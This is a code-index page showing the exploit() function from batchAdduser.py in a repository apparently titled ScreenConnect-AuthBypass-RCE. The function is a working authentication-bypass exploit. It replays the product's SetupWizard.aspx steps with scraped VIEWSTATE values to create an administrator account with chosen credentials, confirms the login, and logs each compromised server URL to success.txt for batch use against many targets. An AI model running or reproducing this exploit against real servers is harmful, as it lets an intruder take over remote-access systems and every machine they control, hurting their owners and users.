MCPcopy Index your code
hub / github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE / exploit

Function exploit

batchAdduser.py:17–48  ·  view source on GitHub ↗
(url, username, password, domain)

Source from the content-addressed store, hash-verified

15}
16
17def exploit(url, username, password, domain):
18 if checkVersion(url):
19 try:
20 initial_request = requests.get(url=url + "/SetupWizard.aspx/", verify=False)
21 viewstate_1 = re.search(r'value="([^"]+)"', initial_request.text).group(1)
22 viewgen_1 = re.search(r'VIEWSTATEGENERATOR" value="([^"]+)"', initial_request.text).group(1)
23 next_data = {"__EVENTTARGET": '', "__EVENTARGUMENT": '', "__VIEWSTATE": viewstate_1,
24 "__VIEWSTATEGENERATOR": viewgen_1,
25 "ctl00$Main$wizard$StartNavigationTemplateContainerID$StartNextButton": "Next"}
26 next_request = requests.post(url=url + "/SetupWizard.aspx/", headers=exploit_header, data=next_data, verify=False)
27 exploit_viewstate = re.search(r'value="([^"]+)"', next_request.text).group(1)
28 exploit_viewgen = re.search(r'VIEWSTATEGENERATOR" value="([^"]+)"', next_request.text).group(1)
29 exploit_data = {"__LASTFOCUS": '', "__EVENTTARGET": '', "__EVENTARGUMENT": '', "__VIEWSTATE": exploit_viewstate,
30 "__VIEWSTATEGENERATOR": exploit_viewgen, "ctl00$Main$wizard$userNameBox": username,
31 "ctl00$Main$wizard$emailBox": username + f"@{domain}",
32 "ctl00$Main$wizard$passwordBox": password, "ctl00$Main$wizard$verifyPasswordBox": password,
33 "ctl00$Main$wizard$StepNavigationTemplateContainerID$StepNextButton": "Next"}
34 requests.post(url=url + "/SetupWizard.aspx/", headers=exploit_header, data=exploit_data, verify=False)
35 check_url = url + "/Services/AuthenticationService.ashx/TryLogin"
36 check_data = f"""["{username}","{password}",null,null,null]"""
37 check_header = {
38 "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36",
39 "Content-Type": "application/json"
40 }
41 check_response = requests.post(url=check_url, data=check_data, headers=check_header, verify=False)
42 if check_response.ok and "1" in check_response.text:
43 print(f"[+] {url} Successfully added user. username: {GREEN}{username}{RESET} and password: {GREEN}{password}{RESET}")
44 with open("success.txt", "a+") as success_file:
45 success_file.write(url + "\n")
46 success_file.close()
47 except:
48 pass
49
50def checkVersion(url):
51 try:

Callers

nothing calls this directly

Calls 1

checkVersionFunction · 0.70

Tested by

no test coverage detected